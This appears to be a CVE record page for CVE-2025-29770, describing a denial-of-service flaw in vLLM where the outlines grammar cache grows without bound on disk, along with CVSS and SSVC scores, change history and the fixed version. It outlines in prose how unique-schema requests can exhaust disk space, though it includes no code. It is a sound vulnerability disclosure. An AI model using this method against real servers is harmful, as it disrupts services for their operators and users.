vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0.
History

Thu, 20 Mar 2025 14:00:00 +0000

Type Values Removed Values Added
References
Metrics threat_severity

None

threat_severity

Moderate


Wed, 19 Mar 2025 21:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Wed, 19 Mar 2025 15:45:00 +0000

Type Values Removed Values Added
Description vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0.
Title vLLM denial of service via outlines unbounded cache on disk
Weaknesses CWE-770
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}


cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published: 2025-03-19T15:31:00.403Z

Updated: 2025-03-19T20:15:47.505Z

Reserved: 2025-03-11T14:23:00.474Z

Link: CVE-2025-29770

cve-icon Vulnrichment

Updated: 2025-03-19T20:15:43.284Z

cve-icon NVD

Status : Received

Published: 2025-03-19T16:15:31.977

Modified: 2025-03-19T16:15:31.977

Link: CVE-2025-29770

cve-icon Redhat

Severity : Moderate

Publid Date: 2025-03-19T15:31:00Z

Links: CVE-2025-29770 - Bugzilla